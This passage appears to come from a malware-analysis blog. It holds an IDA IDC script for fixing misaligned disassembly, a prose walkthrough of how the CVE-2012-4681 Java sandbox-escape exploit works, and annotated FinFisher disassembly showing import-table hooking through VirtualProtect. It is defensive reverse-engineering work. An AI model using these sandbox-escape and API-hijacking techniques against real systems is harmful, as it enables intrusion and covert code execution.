<span style="font-family: Verdana, sans-serif;">No, it isn't! IDA tries to convert the bytes into code, but if they are unaligned it might do that starting from the wrong offset or even fail to complete the task. This happens because IDA originally disassembled the string bytes as code, which led to the disassembly of the following bytes in incorrect instructions like the above "</span><span style="font-family: Courier New, Courier, monospace;">or dword ptr [ebp-0FFBFD8h]</span><span style="font-family: Verdana, sans-serif;">". Because of this, when you try to realign the code, and assemble the correct instruction starting from the byte "8D", IDA fails because the opcode "8D" needs to take the bytes from the "or" instruction, and IDA won't break an instruction that already exists.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Even undefining some of the bytes after the string and then trying to translate them back into code doesn't work because, for the nature of the problem, you don't know exacly how many bytes is better to consider to do this task. You can make some heuristic and try with about ten bytes, but this solution doesn't always give accurate results. Moreover, if there's another call in those ten bytes the things go even worse!</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The basic idea to try to solve the problem is to manually parse the raw bytes. I wrote a little IDC script to do that; here is a brief explanation of how it works:</span><br />
<span style="font-family: Verdana, sans-serif;">
</span>
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">It searches for the "0xE8" byte and takes its operand, that is the size of the string.</span></li>
<span style="font-family: Verdana, sans-serif;">
</span>
<li><span style="font-family: Verdana, sans-serif;">It undefines the subsequent "size" bytes and recomposes them as a string.</span></li>
<span style="font-family: Verdana, sans-serif;">
</span>
<li><span style="font-family: Verdana, sans-serif;">Then, it iterates the following procedure:</span></li>
<span style="font-family: Verdana, sans-serif;"><br />
</span><ol>
<li><span style="font-family: Verdana, sans-serif;">It tries to undefine a byte and to make an instruction from it (after the first execution of this step, the undefining operation won't have any effect in case of step <i>3.</i>).</span></li>
<span style="font-family: Verdana, sans-serif;"><br />
</span>
<li><span style="font-family: Verdana, sans-serif;">If the instruction is made, go back to <i>1.</i> and continue with the bytes after the instruction.</span></li>
<span style="font-family: Verdana, sans-serif;"><br />
</span>
<li><span style="font-family: Verdana, sans-serif;">If the instruction wasn't made, undefine one more byte (to a maximum of 16), in the attempt at making it, and repeat from step <i>1.</i></span></li>
</ol>
</ul>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In this way, only one byte </span><span style="font-family: Verdana, sans-serif;">at a time</span><span style="font-family: Verdana, sans-serif;"> </span><span style="font-family: Verdana, sans-serif;">is undefined and so is the building of the corresponding instruction, whenever possible.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I also assumed that if there are four subsequent instructions that are already interpreted as code, then the bytes are aligned and the work is done. </span><span style="font-family: Verdana, sans-serif;">Finally, if any of the recomposed instructions is a call, the algorithm will start over again.</span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Here is the final script (change "MIN" and "MAX" with the addresses that define the range of the code in which you want to run the script - e.g. MIN = 0x00401000, MAX = 0x00404FFF):</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">auto i, j;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">auto Size;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">auto Delta, DeltaTemp, DeltaUndef;</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">for(i = MIN; i < MAX; i++)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> if(Byte(i) == 0xE8)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> Size = Dword(i + 1);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> if(Size > 1 && Size < 100)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> Message(" %08x \n ", i);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> MakeUnknown(i+5, Size, DOUNK_DELNAMES);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> MakeStr(i+5, i+5+Size);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> Delta = 0;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> DeltaUndef = 0;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> for(j = 0; j < 4; j++)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> if(Byte(i+5+Size + Delta) == 0xE8)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> break;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> MakeUnknown(i+5+Size + Delta, 1, DOUNK_DELNAMES);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> DeltaTemp = MakeCode(i+5+Size + Delta);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> if(DeltaTemp != 0)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> Delta = Delta + DeltaTemp;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> DeltaUndef = 0;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> else</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> j = 0;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> DeltaUndef++;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> if(DeltaUndef > 16)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> break;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> if(Byte(i+5+Size + Delta + DeltaUndef) == 0xE8)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> break;</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> MakeUnknown(i+5+Size + Delta + DeltaUndef, 1, DOUNK_DELNAMES);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> Message("-- Undef %08x \n", i+5+Size + Delta + DeltaUndef);</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">}</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">P.S. I know the code looks twisty and more complicated than it needs to be, but I had to write it this way to bypass some glitches I was having with a couple of IDC APIs.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-8486410581488632172012-08-27T18:25:00.000-07:002012-09-04T17:05:35.319-07:00Analysing CVE-2012-4681 (latest Java 0day)<span style="font-family: Verdana, sans-serif;">Yesterday I spotted the news about a new Java 0day being exploited in the wild and soon after a POC was released: <a href="http://pastie.org/4594319">http://pastie.org/4594319</a>.</span><br />
<span style="font-family: Verdana, sans-serif;">I decided to analyse this code to understand what is the vulnerability that triggers the exploit. Here is a brief description of my findings.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The code instantiates a <i>Statement</i> object that will be used to run the <i>setSecurityManager()</i> method of the <i>System</i> class. The purpose is to set the Security Manager to null, which means escaping the Java sandbox. Of course, you can't do this directly and here comes the exploit!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The <i>Statement </i>object contains a field named "acc", which is a <i>AccessControlContext </i>(a sort of security descriptor) that specifies the permissions allowed for the <i>Statement </i>object itself. This field is normally not accessible from the code outside the <i>Statement </i>class, so the exploit needs to find a way to modify it.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">It does so by using the <i>getField() </i>method of the <i>sun.awt.SunToolkit</i> object: this function returns a given field from a given object; in this case it returns <i>Statement.acc</i>. At this point the game is over because the malicious code can just create a new <i>AccessControlContext </i>object, assign to it full permissions and then replace the old restricted <i>Statement.acc</i> with the new unrestricted one.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Mistery solved? Not yet: the tricky part is in obtaining an instance of the object <i>sun.awt.SunToolkit</i>, that is supposed to be a restricted package. The exploit does this by calling <i>Class.forName()</i>; this method simply returns an object from its name.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is how I understand the code (and I'm no Java expert), but I read <a href="http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html">this blog entry</a> that has a slightly different explanation. In their analysis, the authors see another method that accomplishes the task: <i>com.sun.beans.finder.ClassFinder</i>.</span><br />
<span style="font-family: Verdana, sans-serif;">I don't know what this is about: do they have a different POC or sample? It does seem so!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Also they say that the exploit itself relies on the possibility of instantiating the <i>sun.awt.SunToolkit</i> object through the <i>com.sun.beans.finder.ClassFinder</i> object. This would mean that in the POC I have analysed the vulnerability is in the <i>Class.forName()</i> method, that is, there are TWO different vulnerabilities (one in <i>ClassFinder </i>and one in <i>Class.forName()</i>).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">However, debugging the exploit in Java version 1.6 (jre6) it did not work: the <i>Class.forName()</i> object successfully instantiated the <i>sun.awt.SunToolkit</i> object, but then the use of its <i>getField()</i> method threw an exception. Instead, the method works fine in version 1.7 (jre7). To make it short:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSMzIAaz5uSe1-tjxcvuAGtSrlGP8XqJMuGFDW0LdZAKjfoCzot7bkPq0OJW_2Qqt_QHwLQuEqR3EJxag2adyVRGoI7WrZ11vt9OlYiC8EpDLnLcidRfKDtdpfvUJQ-leWSDNvlRNTXkk/s1600/graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSMzIAaz5uSe1-tjxcvuAGtSrlGP8XqJMuGFDW0LdZAKjfoCzot7bkPq0OJW_2Qqt_QHwLQuEqR3EJxag2adyVRGoI7WrZ11vt9OlYiC8EpDLnLcidRfKDtdpfvUJQ-leWSDNvlRNTXkk/s640/graph.png" width="640" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So, even if version 1.6 allows the instantiation of the <i>sun.awt.SunToolkit</i> object, it prevents it from accessing the private <i>Statement.acc</i> field, which seems correct. It seems that the bug is really in version 1.7, in the access to the <i>Statement.acc</i>. Or maybe none of the two is supposed to happen: <i>sun.awt.SunToolkit</i> must not be instantiated to restricted code, and the <i>Statement.acc </i>field must not be accessed by anyone.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I will look forward to new results.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">*UPDATE* [28 August 2012]</span><br />
<span style="font-family: Verdana, sans-serif;">1) Now we can refer to the above vulnerability as "CVE-2012-4681".</span><br />
<span style="font-family: Verdana, sans-serif;">2) A new analysis, based on the same POC I documented, has been published today: <a href="http://thexploit.com/sec/java-facepalm-suntoolkit-getfield-vulnerability/">http://thexploit.com/sec/java-facepalm-suntoolkit-getfield-vulnerability/</a> . So, yes, it seems that <i>getField()</i> is the culprit, or at least it's one of them...</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;">*UPDATE 2* [28 August 2012]</span><br />
<span style="font-family: Verdana, sans-serif;">A more in-depth analysis is finally out: <a href="http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html">http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html</a></span><br />
<span style="font-family: Verdana, sans-serif;">As I though there are two different 0days: one that allows you to get a reference to the restricted class </span><i style="font-family: Verdana, sans-serif;">sun.awt.SunToolkit, </i><span style="font-family: Verdana, sans-serif;">and the other one (<i>getField()</i>) that lets you access a private field of a class. The missing detail (<i>classFinder()</i>) is also solved: it is used in the internal implementation of the <i>execute()</i> method of the <i>Expression </i>object.</span><br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-38719094479269637132012-08-17T15:30:00.000-07:002012-11-24T06:57:53.154-08:00FinFish's trick... not so legendary!<span style="font-family: Verdana, sans-serif;">This post is about a trick that Finfish uses to appear (well, at least, "to try to appear"!) as a normal, non malicious program. </span><br />
<span style="font-family: Verdana, sans-serif;">First of all you can immediately notice that this sample is a simple loader: you can have a look at the IDA navigation bar to spot a tiny code section in contrast to a huge resource section. </span><br />
<span style="font-family: Verdana, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuXNDPMCL9V_tKsUhH4LQlLY4O9KdW0vVtzXogIsxYeRdwEJeRXBegoPqJVGGAouyR74GAL96vlC9ZXK-hl0gW7FZ-WLUkop78gZJbdhPS0S5RsM5F82KqOL2bq0oG6iu9UCZSdZUxSho/s1600/bar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuXNDPMCL9V_tKsUhH4LQlLY4O9KdW0vVtzXogIsxYeRdwEJeRXBegoPqJVGGAouyR74GAL96vlC9ZXK-hl0gW7FZ-WLUkop78gZJbdhPS0S5RsM5F82KqOL2bq0oG6iu9UCZSdZUxSho/s1600/bar.png" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br />
<br />
This tells us that something is hidden somewhere in the resources. The payloads, in fact, are encrypted and stored in the dialog type resources. </span><span style="font-family: Verdana, sans-serif;">Here's a quick verification test, that shows that something is wrong in the dialog data: </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsnmyFAf0iHrJSLXmJfdkgyIm08WRfHnmMqaWmp_0FotfR0_mVQZ-NdY5fjBWO7-9hAqu7GB1zX-0zSpvaKMs0bRzi_aPSVUJZG-GqfEJhWNKSsPm0c-1GsPlGqoHKuwG-LQ998faevuo/s1600/resource.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsnmyFAf0iHrJSLXmJfdkgyIm08WRfHnmMqaWmp_0FotfR0_mVQZ-NdY5fjBWO7-9hAqu7GB1zX-0zSpvaKMs0bRzi_aPSVUJZG-GqfEJhWNKSsPm0c-1GsPlGqoHKuwG-LQ998faevuo/s1600/resource.png" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">But let's go back to the curious trick we mentioned, and let's begin by analyzing the code. </span><span style="font-family: Verdana, sans-serif;">If we start looking from the entry point we notice... absolutely nothing! </span><br />
<span style="font-family: Verdana, sans-serif;">At a first glance nothing suggests that we are analyzing a malware, as we only go through some common APIs.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVFWfxh3zZ8AiGKsCrFdMM9XtvNIuFV44juYPozgy34WC1BREHxlLsKM-o0xo3JvrpKFy5KQzQCGueATa8W8npLV8c_OhXDjcbD0aRM_rJsmXJqe-ogN5vNtNx2MVV9gmmlK4zET23F9E/s1600/common_apis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVFWfxh3zZ8AiGKsCrFdMM9XtvNIuFV44juYPozgy34WC1BREHxlLsKM-o0xo3JvrpKFy5KQzQCGueATa8W8npLV8c_OhXDjcbD0aRM_rJsmXJqe-ogN5vNtNx2MVV9gmmlK4zET23F9E/s1600/common_apis.png" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Of course, a deeper reading reveals the trick: in the middle of some legitimate calls we find a suspicious function. The thing that more captured my attention is that it makes use of the </span><i style="font-family: Verdana, sans-serif;">VirtualProtect</i><span style="font-family: Verdana, sans-serif;"> API different times, apparently without any good reason, as we will see later. </span><br />
<span style="font-family: Verdana, sans-serif;"><br />
For now let's start from the beginning:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:004011F5 push 0 ; lpModuleName</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004011F7 call ds:GetModuleHandleW</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004011FD mov ebp, eax ; MZ header</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004011FF mov eax, [ebp+3Ch] ; MZ.elfanew = PE offset</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401202 mov esi, [eax+ebp+80h] ; import table RVA</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401209 mov eax, [esi+ebp+0Ch] ; import name RVA</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This code gets the handle of the application itself and then it reads: the MZ header; the PE offset; the import table RVA; the first import name RVA.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:0040120D add esi, ebp ; virtual address of the image import descriptor</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401223 add eax, ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401225 push offset aUser32_dll_0 ; "user32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040122A push eax ; char *</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040122B call __stricmp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401230 add esp, 8</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401237 add esi, 14h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040123A mov [esp+18h+var_4], esi</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040123E jmp loc_4012E6</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012E6 mov eax, [esi+0Ch]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012E9 test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012EB jnz loc_401223</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Then the malware calculates the virtual addresses of the first image import descriptor, its import name address, and begins a loop over the import names looking for "user32.dll".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401243 mov edi, [esi]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401245 mov esi, [esi+10h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401248 mov eax, [edi+ebp]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040124B add edi, ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040124D add esi, ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401257 jmp short loc_401260</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401260 lea ecx, [eax+ebp+2] ; Name</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401264 push offset aRegisterclasse ; "RegisterClassExW"</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401269 push ecx ; char *</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040126A call __stricmp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040126F add esp, 8</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401272 test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401274 jnz short loc_401297</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401297 mov edx, [edi]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401299 lea eax, [edx+ebp+2]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040129D push offset aCreatewindowex ; "CreateWindowExW"</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012A2 push eax ; char *</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012A3 call __stricmp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012A8 add esp, 8</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012AB test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012AD jnz short loc_4012D0</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D0 mov eax, [edi+4]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D3 add edi, 4</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D6 add esi, 4</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D9 test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012DB jnz short loc_401260</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here the code saves the content of the <i>OriginalFirstThunk</i> and the <i>FirstThunk</i> fields of the <i>IMAGE_IMPORT_DESCRIPTOR</i>. Then, it loops over every <i>IMAGE_IMPORT_BY_NAME</i>.<i>Name </i>looking for the <i>RegisterClassExW</i> and the <i>CreateWindowExW</i> APIs.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
Once they are found it does the following:</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
[RegisterClassExW]</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401276 lea edx, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127A push edx ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127B push 40h ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127D push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127F push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401280 call ebx ; VirtualProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401282 lea eax, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401286 push eax ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401287 mov dword ptr [esi], offset BadFunc1 ; FirstThunk overwrite</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040128D mov ecx, [esp+1Ch+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401291 push ecx ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401292 push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401294 push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401295 call ebx ; VirtualProtect</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
<br />
[CreateWindowExW]</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012AF lea ecx, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B3 push ecx ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B4 push 40h ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B6 push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B8 push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B9 call ebx ; VirtualProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012BB lea edx, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012BF push edx ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012C0 mov dword ptr [esi], offset BadFunc2 ; FirstThunk overwrite</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012C6 mov eax, [esp+1Ch+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CA push eax ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CB push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CD push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CE call ebx ; VirtualProtect</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
<br />
Basically, it changes the protection of the memory containing the import addresses, using the <i>VirtualProtect</i> API; then it overwrites the <i>FirstThunk </i>entry, related to the <i>RegisterClassExW</i> and <i>CreateWindowExW</i> APIs, with a malicious offset.</span><br />
<span style="font-family: Verdana, sans-serif;">In this way, every time one of these APIs is called it won't be executed and, instead, the code located at the malicious offset will be run. Even debugging the code, if we don't step into the calls, nothing will suggest that the code is being hijacked.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjGvbKlQ7wY8MjCIEE3vejNvKUhVb4CVJGA8J3vTFfzxozXl4sQZ26vPDwNdg6zd8QdkrJBM1JfftDWFQcmmVyDv20h05c58lob-l6p4asFAusEKNDf09eK6pAPdfevf-qOUyAxzxnhq8/s1600/RegisterClassExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjGvbKlQ7wY8MjCIEE3vejNvKUhVb4CVJGA8J3vTFfzxozXl4sQZ26vPDwNdg6zd8QdkrJBM1JfftDWFQcmmVyDv20h05c58lob-l6p4asFAusEKNDf09eK6pAPdfevf-qOUyAxzxnhq8/s1600/RegisterClassExW.png" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoH0UCkM9dHsFzJG6jIuw_y-7QodxludhEy9bCAHe6G7QBNn6sgUiWbOplj1Y5gt7JmK6l1QSy9mb-fwBcQvojpMCDHpTG-D7Tw4gsf6pKkUPGy9c6u_GdsQitxeTywCz8UTNo7f0S2HQ/s1600/CreateWindowExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
